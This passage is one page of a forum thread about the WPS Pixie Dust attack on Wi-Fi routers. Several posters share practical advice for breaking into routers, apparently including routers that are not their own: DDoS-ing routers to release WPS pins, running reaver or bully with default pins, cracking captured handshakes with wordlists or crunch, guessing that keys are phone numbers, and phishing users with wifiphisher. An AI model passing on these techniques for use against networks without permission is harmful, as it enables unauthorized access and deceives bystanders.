Page 56 of 59 FirstFirst ... 6465455565758 ... LastLast
Results 551 to 560 of 582

Thread: WPS Pixie Dust Attack (Offline WPS Attack)

  1. #551
    Senior Member
    Join Date
    Jul 2013
    Posts
    809
    To Paulnewman

    Outside of brute forcing a handshake or wpa phishing there are three(3) possibilities. Chances of success are SMALL, may not be immediate and these attacks may not work at all!

    Method One

    Some routers when subject to small amounts of DDOS release WPS pins even though the WPS system is locked. You can test this vulnerability by using one of the VMR-MDK variants.

    Method Two

    Some routers reset their WPS pins to 12345670 and become open to WPS pin collection for short periods of time. You can run reaver or bully with the pin 12345670 in the command line and constantly attack the router a for long period of time(ie weeks). Better just run up varmacscan when your computer is idle and you may get lucky.

    Method Three

    Some routers reset after being subjected to heavy DDOSing. Mteams has not had much success with Method Three.

  2. #552
    Junior Member
    Join Date
    Jun 2016
    Posts
    4
    i try use the suggested script VMR-MDK with standard parameters but I always get same errors.
    On a first router:
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Entering recurring delay of 15 seconds
    On a second router:
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670.

    In both case the command wash shows that wps is not locked but the system try always the same PIN 12345670 and don't go forward....
    Last edited by Paulnewman; 2016-06-12 at 01:31 PM.

  3. #553
    Senior Member
    Join Date
    Jul 2013
    Posts
    809
    To Paulnewman

    If the wps system is OPEN then VMR-MDK is not the tool of choice.

    MTeams suggests you use the command line first in most cases where the WPS system is open. Try both reaver and bully.

    There are many reasons why you cannot get reaver to collect pins. You might put the --wps command in aerodump-ng, point it at your target by adding the -c channel and --bssid see what information aerodump-ng supplies.

    In the end you may have to resort to brute force by collecting a handshake. Remember approx 50% of the WPA keys are simple numeric strings 8 to 10 in length. Back when reaver was king MTeams collected 100's of WPA keys and the 50% rule was obtained. In fact over half of these numeric strings were mobile telephone numbers and a small number of landline numbers with and without the area code.

    MTeams

  4. #554
    Junior Member
    Join Date
    Jun 2016
    Posts
    1
    hi, i know it's a little off topic to pixie's,
    is there any possible way to force the router to reset to it's default factory setup? with wps disable router or forcing wps to enable?

    tried cracking AP with dictionary attack but no luck..

    thanks in advance!
    Last edited by tomodachimo; 2016-06-20 at 08:18 AM.

  5. #555
    Junior Member
    Join Date
    May 2015
    Posts
    25
    To mmusket33

    I have a TP-Link router TL-WR740N, seems like it is impossible to crack the WPS PIN

    First I tried the Wifite, Pixie dust attack- within seconds it says WPS PIN not found

    tried reaver with delay of 10-15 seconds - doesn't help as the router still locks after few wrong WPS PIN attempts

    I tried VM-MDK script, for the first few seconds I get the M1 till M4 messages and then it says " WPS transaction failed, code 0x04"

    I tried the Varmacscan, no luck there either.

    So I want to know, is there a way to crack the pin of locked WPS routers? Usually the routers locks automatically after few failed pin attempts?

    WPA handshake and cracking with wordlist is about luck, if only the passphrase is in the wordlist.

    Note: I did crack the Dlink routers with Wifite(pixie-dust) within seconds, works perfectly.

    It's just the new routers which are hard to crack.

    Running Kali 2.0 Sana all tools updated to the latest.

    Please help. Thanks in advance

  6. #556
    Junior Member
    Join Date
    May 2015
    Posts
    18
    To machx: I have same problem with newer routers as well, almost any of those i have in range are pretty new and updated technicolor-routers so not much luck there.
    But i have recently start to play with wifiphisher instead and have a lot of sucess with that tool.
    Before i had hard to belive that people are so naiv and easy to trick so never bother before to test this way, but now i have change my mind.
    Give it a try^^

  7. #557
    Junior Member
    Join Date
    May 2015
    Posts
    25
    To squash,

    I'll give it a try, thanks a lot, running out of luck,will keep it updated here after the test.

  8. #558
    Junior Member
    Join Date
    Apr 2015
    Posts
    28
    Quote Originally Posted by machx View Post
    To mmusket33

    WPA handshake and cracking with wordlist is about luck, if only the passphrase is in the wordlist.
    You can crack WPA with crunch.

  9. #559
    Junior Member
    Join Date
    May 2015
    Posts
    25
    I had my luck yesterday and I was able to crack with dictionary attack with rockyou.txt
    Others were cracked pixie dust using Wifite
    Rest are still in progress.
    VMR-MDK and Revd3k-r3 and Varmascan doesn't work and no hopes.

    I'm also using default WPS PIN of the router manufacturer and model. It works sometimes
    with default PIN (-p on reaver)

    Still testing, will keep updated

  10. #560
    Junior Member
    Join Date
    Sep 2016
    Posts
    8

    having the k 1,2,3 arguments explained like this in the menu would be helpful

    Quote Originally Posted by soxrok2212 View Post
    Just so you know, -K 1,2,3... Each number is for a different chipset. You have to look up which chipset the router uses and then us the corresponding -K 1,2,3 argument.
    I only started looking into all things wireless 2 weeks ago, and have been using -K 1 for all attacks because that is the only thing mentioned, if you put number next to the chipset in the menu that would be more intuitive for those who haven't read the full history of this post. I am going through it because I want to see the development from day dot to current but most people I know don't want to do that amount of research before using tools.

    Awesome work, as a non-coder (hopefully I develop past script kiddie soon) I am in awe of you

    Apologies on posting halfway through reading the entire thread, I jumped the gun a bit.
    Last edited by vinneth; 2016-09-09 at 08:07 AM. Reason: failed to read properly :-)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •